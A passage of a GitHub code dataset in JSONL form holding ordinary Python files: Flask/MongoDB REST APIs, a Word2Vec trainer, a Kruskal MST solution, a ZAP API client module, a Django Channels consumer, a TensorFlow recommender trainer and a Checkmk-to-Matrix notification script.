Word2Vec\nimport numpy as np\n\n\ndef train(filename, epochs=15):\n traces = get_traces(\"logs/\" + filename)\n model = Word2Vec(traces, min_count=1, workers=12)\n print(\"training\", filename)\n # deveria iterar o modelo? não sei, não são novas sentenças\n\n model.save(\"models/\" + re.sub(r\"\\.csv\", \"\", filename) + \".model\")\n\n\ndef train_batch():\n for filenames in os.listdir(\"logs\"):\n if re.search(r\"\\.csv\", filenames):\n train(filenames)\n\n\ndef create_vectors(filename, vectors):\n model = Word2Vec.load(filename)\n\n trace_vectors = []\n for trace in vectors:\n v = np.array(model.wv[trace[0]])\n\n for word in trace[1:]:\n v = list(map(sum, zip(v, model.wv[word])))\n vec = np.array(v)\n vec = vec / len(trace)\n trace_vectors.append(v)\n return trace_vectors\n","repo_name":"n0mori/tcc","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8785764592","text":"\nfrom flask import Flask, request, jsonify, make_response\nfrom pymongo import MongoClient\nfrom bson import ObjectId\nimport datetime\nimport bcrypt\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\nclient = MongoClient(\"mongodb://127.0.0.1:27017\")\ndatabase = client.books # Using the \"books\" database\nbooks = database.best_books # Using the \"best_books\" collection\n\n\n\n#################################################\n# GET requests\n#################################################\n\n# Get all book records\n@app.route(\"/api/v1.0/books\", methods=[\"GET\"])\ndef get_all_book_records():\n page_number, page_size = 1, 15\n if request.args.get('pn'):\n page_number = int(request.args.get('pn'))\n if request.args.get('ps'):\n page_size = int(request.args.get('ps'))\n page_start = (page_size * (page_number - 1))\n \n book_data = []\n for book in books.find() \\\n .skip(page_start).limit(page_size):\n book['_id'] = str(book['_id'])\n for reader_review in book['reader_reviews']:\n 
reader_review['_id'] = str(reader_review['_id'])\n        book_data.append(book)\n    return make_response( jsonify(book_data), 200 )\n\n\n# Retrieve a specific book record\n@app.route(\"/api/v1.0/books/<string:bookId>\", \\\n    methods=[\"GET\"])\ndef show_one_book_record(bookId):\n    book = books.find_one({'_id':ObjectId(bookId)})\n    if book is not None:\n        book['_id'] = str(book['_id'])\n        for reader_review in book['reader_reviews']:\n            reader_review['_id'] = str(reader_review['_id'])\n        return make_response( jsonify( book ), 200 )\n    else:\n        return make_response( jsonify( \\\n            {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n# Get the title of the book after specifying the ID\n@app.route(\"/api/v1.0/books/<string:bookId>/title\", \\\n    methods=[\"GET\"])\ndef get_book_title(bookId):\n    book = books.find_one({'_id':ObjectId(bookId)}, {'title': 1 , '_id': 0})\n    if book is not None:\n        return make_response( jsonify( book ), 200 )\n    else:\n        return make_response( jsonify( \\\n            {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n\n# Get the book's author after specifying the ID\n@app.route(\"/api/v1.0/books/<string:bookId>/author\", \\\n    methods=[\"GET\"])\ndef get_author_of_book(bookId):\n    book = books.find_one({'_id':ObjectId(bookId)}, {'author': 1 , '_id': 0})\n    if book is not None:\n        return make_response( jsonify( book ), 200 )\n    else:\n        return make_response( jsonify( \\\n            {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n# Get the year that the book was published\n@app.route(\"/api/v1.0/books/<string:bookId>/year\", \\\n    methods=[\"GET\"])\ndef get_published_year(bookId):\n    book = books.find_one({'_id':ObjectId(bookId)}, {'year': 1 , '_id': 0})\n    if book is not None:\n        return make_response( jsonify( book ), 200 )\n    else:\n        return make_response( jsonify( \\\n            {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n\n\n# Get all review(s) of a book record\n@app.route(\"/api/v1.0/books/<string:bookId>/reader_reviews\", \\\n    methods=[\"GET\"])\ndef retrieve_reviews(bookId):\n    list_of_reviews = []\n    book = books.find_one( { \"_id\" : ObjectId(bookId) }, \\\n        { \"reader_reviews\" : 1, \"_id\" : 0 } )\n    if book is None:\n        return make_response( jsonify( \\\n            {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n    for bookreview in book[\"reader_reviews\"]:\n        bookreview[\"_id\"] = str(bookreview[\"_id\"])\n        list_of_reviews.append(bookreview)\n    return make_response( jsonify( list_of_reviews ), 200 )\n\n\n\n\n# Get a specific book review by specifying the ID\n@app.route(\"/api/v1.0/books/<string:bookId>/reader_reviews/<string:revId>\", \\\n    methods=[\"GET\"])\ndef retrieve_one_review(bookId, revId):\n    book = books.find_one( { \"reader_reviews._id\" : ObjectId(revId) }, \\\n        { \"_id\" : 0, \"reader_reviews.$\" : 1 } )\n    if book is None:\n        return make_response( \\\n            jsonify(\n                {\"error\":\"The book review ID is invalid, please enter a valid ID\"}), 404)\n    book['reader_reviews'][0]['_id'] = \\\n        str(book['reader_reviews'][0]['_id'])\n\n    return make_response( jsonify( book['reader_reviews'][0]), 200)\n\n\n\n\n
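# Example (hypothetical ids):\n#   GET /api/v1.0/books/5f8f8c44b54764421b7156c3/reader_reviews/5f8f8c44b54764421b7156c9\n# returns just that one review, thanks to the positional projection ($) used above\n\n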
\"language\" : request.form[\"language\"],\n \"cover_image\" : request.form[\"cover_image\"],\n \"pages\" : request.form[\"pages\"],\n \"year\" : request.form[\"year\"],\n \"reader_reviews\" : []\n }\n new_book_id = books.insert_one( \\\n new_book)\n new_book_link = \"http://localhost:5000/api/v1.0/books/\" \\\n + str(new_book_id.inserted_id)\n return make_response( jsonify(\n {\"url\": new_book_link} ), 201)\n else:\n return make_response( jsonify(\n {\"error\":\"Data is missing. Please try again\"} ), 404)\n\n\n\n\n# Add a new review to a book\n@app.route(\"/api/v1.0/books//reader_reviews\", \\\n methods=[\"POST\"])\ndef add_new_book_review(bookId):\n new_review = {\n \"_id\" : ObjectId(),\n \"name\" : request.form[\"name\"],\n \"comments\" : request.form[\"comments\"],\n \"book_rating\" : request.form[\"book_rating\"]\n }\n books.update_one( { \"_id\" : ObjectId(bookId) }, \\\n { \"$push\": { \"reader_reviews\" : new_review } } )\n new_review_url = \"http://localhost:5000/api/v1.0/books/\" \\\n + bookId + \"/reader_reviews/\" + str(new_review['_id'])\n return make_response( jsonify( \\\n { \"url\" : new_review_url } ), 201 )\n\n\n\n\n\n\n#################################################\n# PUT requests\n#################################################\n\n# Edit the details of a book\n@app.route(\"/api/v1.0/books/\", \\\n methods=[\"PUT\"]) \ndef edit_book_details(bookId):\n if \"author\" in request.form and \\\n \"title\" in request.form and \\\n \"country\" in request.form and \\\n \"language\" in request.form and \\\n \"cover_image\" in request.form and \\\n \"pages\" in request.form and \\\n \"year\" in request.form:\n result = books.update_one( \\\n { \"_id\" : ObjectId(bookId) }, {\n \"$set\" : { \"author\" : request.form[\"author\"],\n \"title\" : request.form[\"title\"],\n \"country\" : request.form[\"country\"],\n \"language\" : request.form[\"language\"],\n \"cover_image\" : request.form[\"cover_image\"],\n \"pages\" : request.form[\"pages\"],\n \"year\" : request.form[\"year\"]\n\n }\n } )\n if result.matched_count == 1:\n updated_book_details = \\\n \"http://localhost:5000/api/v1.0/books/\" + bookId\n return make_response( jsonify(\n { \"url\":updated_book_details } ), 200)\n else:\n return make_response( jsonify(\n { \"error\":\"Enter a valid book ID\" } ), 404)\n else:\n return make_response( jsonify(\n { \"error\" : \"Data is missing. 
# Edit a book review\n@app.route(\"/api/v1.0/books/<string:bookId>/reader_reviews/<string:revId>\", \\\n    methods=[\"PUT\"])\ndef alter_book_review(bookId, revId):\n    altered_review = {\n        \"reader_reviews.$.name\" : request.form[\"name\"],\n        \"reader_reviews.$.comments\" : request.form[\"comments\"],\n        \"reader_reviews.$.book_rating\" : request.form['book_rating']\n    }\n    books.update_one( \\\n        { \"reader_reviews._id\" : ObjectId(revId) }, \\\n        { \"$set\" : altered_review } )\n    altered_review_url = \"http://localhost:5000/api/v1.0/books/\" + \\\n        bookId + \"/reader_reviews/\" + revId\n    return make_response( jsonify( \\\n        {\"url\":altered_review_url} ), 200)\n\n\n\n\n#################################################\n# DELETE requests\n#################################################\n\n# Delete a book record from the collection\n@app.route(\"/api/v1.0/books/<string:bookId>\", \\\n    methods=[\"DELETE\"])\ndef delete_book(bookId):\n    result = books.delete_one( \\\n        { \"_id\" : ObjectId(bookId) } )\n    if result.deleted_count == 1:\n        return make_response( jsonify( {} ), 204)\n    else:\n        return make_response( jsonify( \\\n            { \"error\" : \"This book record has already been deleted\" } ), 404)\n\n\n\n# Delete a review for a book\n@app.route(\"/api/v1.0/books/<string:bookId>/reader_reviews/<string:revId>\", \\\n    methods=[\"DELETE\"])\ndef remove_book_review(bookId, revId):\n    books.update_one( \\\n        { \"_id\" : ObjectId(bookId) }, \\\n        { \"$pull\" : { \"reader_reviews\" : \\\n            { \"_id\" : ObjectId(revId) } } } )\n    return make_response( jsonify( {} ), 204)\n\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"NiallCurley1996/Back-end-Python-code","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":9402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"1717703577","text":"name = '박규민'\nnum = '202211415'\nage = '21'\n자기소개1 = 'Hello. I am a programming-loving'\n\nlist = [name, num, age, 자기소개1]\n\n자기소개2 = 'My hobbies are taking photos and watching movies.'\nlist.append(자기소개2)\n\n\nprint(('Name : ' + name), ('Age : ' + age ), ('Introduction : ' + list[3] + ' ' + list[1] + ' ' + list[0] + '. ' + list[4]), sep='\\n')\n\n\n\n\n# I wrote all the code for this assignment myself, without referring to any other student's code.\n# I did not distribute the results of this assignment to any other student.\n# I followed all submission instructions (submission format).\n# If not, I will accept any penalty.\n# Dept. of Industrial Engineering_202211415_박규민","repo_name":"KMPAR/Python_homework","sub_path":"박규민_202211415_Practice2.py","file_name":"박규민_202211415_Practice2.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23792080230","text":"#1197 Minimum Spanning Tree\n#Kruskal Algorithm\n# 1. Sort the edges.\n# 2. Find the roots of the two vertices each edge connects.\n# 3. If the roots differ, rewrite one of them so the two components are joined.\n# Kruskal's algorithm has to sort the edges, so use it when the graph has few edges.\n# Using Kruskal's Algorithm:\n# 1. Create a Vroot array storing each vertex's root (the root is the smallest value in the connected component; initially each vertex stores itself).\n# 2. Sort the edges (Elist) by weight.\n# 3. For each edge, find the roots (sRoot, eRoot) of its two endpoints with the find function.\n# 4. If the two roots differ, set the larger root to the smaller one so the components are joined.\n# 5. Add the edge weight to the total.\n
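# Worked example (made up): with v=3, e=3 and edges (1,2,1), (2,3,2), (1,3,3),\n# (1,2,1) and (2,3,2) are taken and (1,3,3) would close a cycle, so the answer is 3.\n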
import sys\n\ndef find(x):\n    # print(x)\n    # print(Vroot)\n    if x != Vroot[x]:\n        Vroot[x] = find(Vroot[x])\n    return Vroot[x]\n\nv, e = map(int, sys.stdin.readline().split())\nVroot = [i for i in range(v)]\nElist = []\nfor i in range(e):\n    Elist.append(list(map(int, sys.stdin.readline().split())))\nElist.sort(key = lambda x : x[2])\nanswer = 0\nfor a, b, c in Elist:\n    sRoot = find(a-1)\n    eRoot = find(b-1)\n    if sRoot != eRoot:\n        if sRoot > eRoot:\n            Vroot[sRoot] = eRoot\n        else:\n            Vroot[eRoot] = sRoot\n        # print(Vroot)\n        answer += c\nprint(answer)\n\n\n#Reference : https://hillier.tistory.com/54","repo_name":"HyunJunLee-Hi/Coding_test","sub_path":"22.03.05_백준.py","file_name":"22.03.05_백준.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11836289217","text":"import six\n\n\nclass authorization(object):\n\n    def __init__(self, zap):\n        self.zap = zap\n\n    def get_authorization_detection_method(self, contextid):\n        \"\"\"\n        Obtains all the configuration of the authorization detection method that is currently set for a context.\n        \"\"\"\n        return six.next(six.itervalues(self.zap._request(self.zap.base + 'authorization/view/getAuthorizationDetectionMethod/', {'contextId': contextid})))\n\n    def set_basic_authorization_detection_method(self, contextid, headerregex=None, bodyregex=None, statuscode=None, logicaloperator=None, apikey=''):\n        \"\"\"\n        Sets the authorization detection method for a context as one that identifies un-authorized messages based on: the message's status code or a regex pattern in the response's header or body. Also, whether all conditions must match or just some can be specified via the logicalOperator parameter, which accepts two values: \"AND\" (default), \"OR\". \n        \"\"\"\n        params = {'contextId': contextid, 'apikey': apikey}\n        if headerregex is not None:\n            params['headerRegex'] = headerregex\n        if bodyregex is not None:\n            params['bodyRegex'] = bodyregex\n        if statuscode is not None:\n            params['statusCode'] = statuscode\n        if logicaloperator is not None:\n            params['logicalOperator'] = logicaloperator\n        return six.next(six.itervalues(self.zap._request(self.zap.base + 'authorization/action/setBasicAuthorizationDetectionMethod/', params)))\n","repo_name":"zaproxy/zap-api-python","sub_path":"src/zapv2/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"53"}
{"seq_id":"31852463485","text":"# Import the necessary libraries\nimport pandas as pd\nimport gmplot\n# For improved table display in the notebook\nfrom IPython.display import display\n\nraw_data = pd.read_csv(\"coord_3.csv\")\n\n
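# coord_3.csv is assumed to contain at least lat and long columns\n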
# Success! Display the first 5 rows of the dataset\ndisplay(raw_data.head(n=5))\ndisplay(raw_data.info())\n\n# Limit the dataset to the first 400 records for this example\ndata = raw_data.head(n=400)\n\n# Store our latitude and longitude\nlatitudes = data[\"lat\"]\nlongitudes = data[\"long\"]\nprint(longitudes)\n\n# latitudes.remove(\"Done\")\n\n# Creating the location we would like to initialize the focus on.\n# Parameters: Latitude, Longitude, Zoom\ngmap = gmplot.GoogleMapPlotter(40.24717, -111.6477, 16)\ngmap.apikey = \"NOT INCLUDED\"\n# Overlay our datapoints onto the map\nret = gmap.heatmap(latitudes, longitudes)\nprint(ret)\n# Generate the heatmap into an HTML file\ngmap.draw(\"my_heatmap.html\")","repo_name":"samlarsen18/lora_project","sub_path":"heap_map/sams_heat_map.py","file_name":"sams_heat_map.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16221368508","text":"import json\nfrom json.decoder import JSONDecodeError\nfrom channels.db import database_sync_to_async\nfrom channels.exceptions import AcceptConnection, DenyConnection\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom channels.layers import get_channel_layer\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import close_old_connections\nfrom blog.models import ReceiveMessage\n\n\n@database_sync_to_async\ndef set_message(user_id, send_user_id, content):\n    ReceiveMessage.objects.create(\n        user_id=user_id,\n        content=content,\n        send_user_id=send_user_id\n    )\n\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.group_name = \"message_{}\"\n        self.channel_layer = get_channel_layer()\n\n    async def websocket_connect(self, message):\n        if self.scope.get(\"user\", AnonymousUser()).is_anonymous:\n            await self.close()\n            return\n        try:\n            await self.connect()\n        except AcceptConnection:\n            await self.accept()\n        except DenyConnection:\n            await self.close()\n\n    async def connect(self):\n        await self.channel_layer.group_add(\n            self.group_name.format(\n                self.scope['user'].id\n            ), self.channel_name\n        )\n        await self.accept()\n\n    async def disconnect(self, code):\n        if self.scope.get(\"user\", AnonymousUser()).is_anonymous:\n            pass\n        else:\n            await self.channel_layer.group_discard(\n                self.group_name.format(\n                    self.scope['user'].id\n                ), self.channel_name\n            )\n\n    async def receive(self, text_data=None, bytes_data=None, **kwargs):\n        if text_data:\n            await self.receive_json(await self.decode_json(text_data), **kwargs)\n        else:\n            await self.channel_layer.group_discard(\n                self.group_name.format(\n                    self.scope['user'].id\n                ), self.channel_name\n            )\n            await self.close()\n\n    async def receive_json(self, content, **kwargs):\n        try:\n            receive_content = content['content']\n            user_id = content['user_id']\n        except (TypeError, KeyError):\n            await self.channel_layer.group_discard(\n                self.group_name.format(\n                    self.scope['user'].id\n                ), self.channel_name\n            )\n            await self.close()\n        else:\n\n            await set_message(\n                send_user_id=self.scope['user'].id,\n                content=receive_content,\n                user_id=user_id\n            )\n\n    async def chat_message(self, event):\n        close_old_connections()\n        await self.send_json(\n            {\n                'content': event['message'],\n                'send_user': event['send_user']\n            }\n        )\n\n    @classmethod\n    async def encode_json(cls, text_data):\n        return json.dumps(text_data, ensure_ascii=False)\n\n    @classmethod\n    async def decode_json(cls, text_data):\n        
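# tolerate malformed frames by returning None instead of raising\n        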
try:\n            return json.loads(text_data)\n        except JSONDecodeError:\n            pass\n","repo_name":"QingChang1204/djangoProject","sub_path":"djangoProject/apps/blog/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73519572647","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.sparse import csr_matrix, find\n\nimport src.config as config\nfrom src.rec_mf import RecMF\nfrom src.util_recsys import *\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Limiting GPU memory growth\n#\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n    # Restrict TensorFlow to only use the first GPU\n    try:\n        # Currently, memory growth needs to be the same across GPUs\n        for gpu in gpus:\n            tf.config.experimental.set_memory_growth(gpu, True)\n        logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n        print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPUs\")\n    except RuntimeError as e:\n        # Visible devices must be set before GPUs have been initialized\n        print(e)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Load Dataset\n#\ndef load_matrix_csv(path):\n\n    df = pd.read_csv(path, sep=',', header=None)\n\n    user_size = max(df[0].values) + 1\n    item_size = max(df[1].values) + 1\n\n    ret_matrix = csr_matrix((df[2].values, (df[0].values, df[1].values)), shape=(user_size, item_size))\n\n    return df, ret_matrix\n\n\n_, mat_train = load_matrix_csv(config.train_path)\n_, mat_valid = load_matrix_csv(config.valid_path)\n_, mat_test = load_matrix_csv(config.test_path)\n\nmat_train /= config.quantize_unit\nmat_valid /= config.quantize_unit\nmat_test /= config.quantize_unit\n\nnum_users = mat_train.shape[0]\nnum_items = mat_train.shape[1]\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Declaration, including training setting\n#\nrec_model = RecMF(num_users, num_items, config.dim_factors, config.max_quantize)\n\noptimizer = tf.optimizers.Adam(config.learning_rate)\nema = tf.train.ExponentialMovingAverage(decay=config.emv_decay)\nbinary_ce = tf.keras.losses.BinaryCrossentropy()\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Training\n#\nsteps_per_epoch = int(num_users * num_items / config.batch_size)\nmax_step = config.max_epoch * steps_per_epoch\n\n\ndef sample_data():\n    # Sample user-item index\n    sampled_u_index = np.random.randint(num_users, size=config.batch_size)\n    sampled_i_index = np.random.randint(num_items, size=config.batch_size)\n    sampled_value = map(lambda x: mat_train[sampled_u_index[x], sampled_i_index[x]], range(len(sampled_u_index)))\n    sampled_value = np.fromiter(sampled_value, dtype=float)\n\n    # Convert each entry value into a cumulative (thermometer) encoding\n    y = np.zeros([config.batch_size, config.max_quantize + 1], dtype=bool)\n    for i in range(config.max_quantize + 1):\n        y[:, i] = sampled_value > i\n    
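# e.g. with config.max_quantize = 5, a value of 3 becomes [1, 1, 1, 0, 0, 0]\n    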
y = tf.convert_to_tensor(y, dtype=tf.float32)\n\n    # One-hot the user and item index respectively\n    x = tf.concat([tf.one_hot(sampled_u_index, num_users, dtype=tf.float32),\n                   tf.one_hot(sampled_i_index, num_items, dtype=tf.float32)], axis=1)\n    x = tf.tile(tf.expand_dims(x, axis=1), [1, config.max_quantize, 1])\n\n    return x, y\n\n\ndef model_optimization(x, y):\n    with tf.GradientTape() as tape:\n        # Model forwarding\n        pred = rec_model(x)\n\n        # Loss function declaration\n        loss = binary_ce(y_true=y, y_pred=pred)\n\n    gradients = tape.gradient(loss, rec_model.trainable_variables)\n    optimizer.apply_gradients(zip(gradients, rec_model.trainable_variables))\n\n    ema.apply(rec_model.trainable_variables)\n\n\ndef training():\n    x, y = sample_data()\n    model_optimization(x, y)\n\n\ndef testing():\n    x, y = sample_data()\n    pred = rec_model(x)\n    return binary_ce(y_true=y, y_pred=pred)\n\n\nfor step in range(max_step):\n    # Model training\n    training()\n\n    if step % 100 == 0:\n        loss = testing()\n\n        # Validation\n        valid_user_idx, _, _ = find(mat_valid)\n        valid_user_idx = set(valid_user_idx)\n        valid_results = evaluate(mat_test, mat_train, rec_model, valid_user_idx, config.top_ks, use_prec_n_recl=True)\n\n        # Testing\n        test_user_idx, _, _ = find(mat_test)\n        test_user_idx = set(test_user_idx) | valid_user_idx\n        test_results = evaluate(mat_test + mat_valid, mat_train, rec_model, test_user_idx, config.top_ks, use_prec_n_recl=True)\n\n\n\n        print(\"Step: %d / %d testing loss = %f\" % (step, max_step, loss))\n\n\n\n\n\n\n","repo_name":"iankuoli/RecMF","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"3260900024","text":"#!/usr/bin/python3\n# Matrix\n\n# Matrix notification script from @beposec inspired by:\n# Telegram_Notification from Stefan Gehn stefan+cmk@srcxbox.net\n# check_mk_matrix_notifications from Stanislav N. aka pztrn\n\n# Tested with Checkmk 2.0.0p17 on Debian Bullseye.\n\nimport os\nimport json\nimport re\nimport sys\nimport string\nimport urllib\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport random\nimport ssl\n\n#################################################################\n# Configure Matrix Connection here:\nMATRIXHOST = ''\nMATRIXTOKEN = ''\n#################################################################\n# Room id is set by Checkmk notification rule parameter\nMATRIXROOM = os.environ[\"NOTIFY_PARAMETER_1\"]\n#################################################################\n\n# Setup context for ssl certificate validation\nsslverify = ssl.create_default_context(capath=\"/etc/ssl/certs/\")\n\n# Prepare Message Template for Host Notifications\n
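# (also sent as HTML: formatted_body below uses org.matrix.custom.html)\n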
tmpl_host_text = \"\"\"Check_MK: $HOSTNAME$ - $EVENT_TXT$\n<pre><code>Host:     $HOSTNAME$\nAlias:    $HOSTALIAS$\nAddress:  $HOSTADDRESS$\nEvent:    $EVENT_TXT$\nOutput:   $LONGHOSTOUTPUT$\nComment:  $NOTIFICATIONCOMMENT$\n</code></pre>
\\n\n\"\"\"\n# Prepare Message Template for Service Notifications\ntmpl_service_text = \"\"\"Check_MK: $HOSTNAME$/$SERVICEDESC$ $EVENT_TXT$\n
<pre><code>Host:     $HOSTNAME$\nAlias:    $HOSTALIAS$\nAddress:  $HOSTADDRESS$\nService:  $SERVICEDESC$\nEvent:    $EVENT_TXT$\nOutput:   $LONGSERVICEOUTPUT$\nComment:  $NOTIFICATIONCOMMENT$\n</code></pre>
\\n\n\"\"\"\n\n\ndef validate_room_id(MATRIXROOM):\n # Validation of given room id\n room_id_pattern = (r\"(![a-zA-Z]+):(([a-z0-9]+(-[a-z0-9]+)*\\.)+[a-z]{2,})\")\n if not re.match(room_id_pattern, MATRIXROOM):\n sys.exit(\n \"The given value '%s' is not a proper [matrix] room id.\"\n % MATRIXROOM\n )\n\n\ndef substitute_context(template, context):\n # Replace all known variables\n for varname, value in context.items():\n template = template.replace('$'+varname+'$', value)\n\n # Remove unused variables and make them empty\n template = re.sub(r\"\\$[A-Z_][A-Z_0-9]*\\$\", \"\", template)\n return template\n\n\ndef construct_message_text(context):\n notification_type = context[\"NOTIFICATIONTYPE\"]\n if notification_type in [\"PROBLEM\", \"RECOVERY\"]:\n txt_info = \"$PREVIOUS@HARDSHORTSTATE$ -> $@SHORTSTATE$\"\n elif notification_type.startswith(\"FLAP\"):\n if \"START\" in notification_type:\n txt_info = \"Started Flapping\"\n else:\n txt_info = \"Stopped Flapping ($@SHORTSTATE$)\"\n elif notification_type.startswith(\"DOWNTIME\"):\n what = notification_type[8:].title()\n txt_info = \"Downtime \" + what + \" ($@SHORTSTATE$)\"\n elif notification_type == \"ACKNOWLEDGEMENT\":\n txt_info = \"Acknowledged ($@SHORTSTATE$)\"\n elif notification_type == \"CUSTOM\":\n txt_info = \"Custom Notification ($@SHORTSTATE$)\"\n else:\n txt_info = notification_type # Should neven happen\n\n txt_info = substitute_context(\n txt_info.replace(\"@\", context[\"WHAT\"]),\n context\n )\n\n context[\"EVENT_TXT\"] = txt_info\n\n if context['WHAT'] == 'HOST':\n tmpl_text = tmpl_host_text\n else:\n tmpl_text = tmpl_service_text\n\n return substitute_context(tmpl_text, context)\n\n\ndef fetch_notification_context():\n context = {}\n for (var, value) in os.environ.items():\n if var.startswith(\"NOTIFY_\"):\n context[var[7:]] = value\n return context\n\n\ndef send_matrix_message(text):\n # Build Matrix Message\n matrixDataDict = {\n \"msgtype\": \"m.text\",\n \"body\": text,\n \"format\": \"org.matrix.custom.html\",\n \"formatted_body\": text,\n }\n matrixData = json.dumps(matrixDataDict)\n matrixData = matrixData.encode(\"utf-8\")\n\n # Create random transaction ID for Matrix Homeserver\n txnId = ''.join(random.SystemRandom().choice(\n string.ascii_uppercase + string.digits) for _ in range(16))\n # Authorization headers and etc.\n matrixHeaders = {\"Authorization\": \"Bearer \" + MATRIXTOKEN,\n \"Content-Type\": \"application/json\",\n \"Content-Length\": str(len(matrixData))}\n # Request\n url = MATRIXHOST \\\n + \"/_matrix/client/r0/rooms/\" \\\n + MATRIXROOM \\\n + \"/send/m.room.message/\" \\\n + txnId\n req = urllib.request.Request(\n url,\n data=matrixData,\n headers=matrixHeaders,\n method='PUT'\n )\n try:\n response = urllib.request.urlopen(req, context=sslverify)\n except urllib.error.URLError as e:\n sys.stdout.write(\n 'Cannot send to matrix room: HTTP-Error %s %s\\n' % (e.reason, e)\n )\n\n\ndef main():\n validate_room_id(MATRIXROOM)\n context = fetch_notification_context()\n text = construct_message_text(context)\n send_matrix_message(text)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"beposec/checkmk-matrix-notify","sub_path":"checkmk_matrix_notification.py","file_name":"checkmk_matrix_notification.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36264649904","text":"from flask_restful import Resource, reqparse\n\nfrom ... 
import db, Post as PostModel\n\nimport traceback\n\nfrom typing import List\n\n\nclass Posts(Resource):\n    def get(self):\n        try:\n            parser = reqparse.RequestParser()\n            parser.add_argument('limit', type=int)\n            parser.add_argument('author_id', type=int)\n\n            args = parser.parse_args()\n            # parse_args() stores None for missing arguments, so `or` supplies the defaults\n            author_id = args.get(\"author_id\") or 0\n            limit = args.get(\"limit\") or 100\n\n            if author_id:\n                posts: List[PostModel] = PostModel.query.filter(PostModel.author_id == author_id).limit(limit).all()\n            else:\n                posts: List[PostModel] = PostModel.query.limit(limit).all()\n\n            return {\n                \"error\": False,\n                \"data\": [\n                    x.to_json() for x in posts\n                ]\n            }, 200\n        except Exception:\n            return {\n                \"error\": True,\n                \"data\": [],\n                \"message\": traceback.format_exc()\n            }\n\n\nclass Post(Resource):\n    def get(self, post_id: int):\n        post: PostModel = PostModel.query.filter(PostModel.id == post_id).first()\n\n        if post:\n            return {\n                \"error\": False,\n                \"data\": post.to_json()\n            }, 200\n        else:\n            return {\n                \"error\": True,\n                \"data\": [],\n                \"message\": \"No post found with id `{}`\".format(post_id)\n            }\n","repo_name":"return0927/hello20backend","sub_path":"backend/routes/api_v1/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}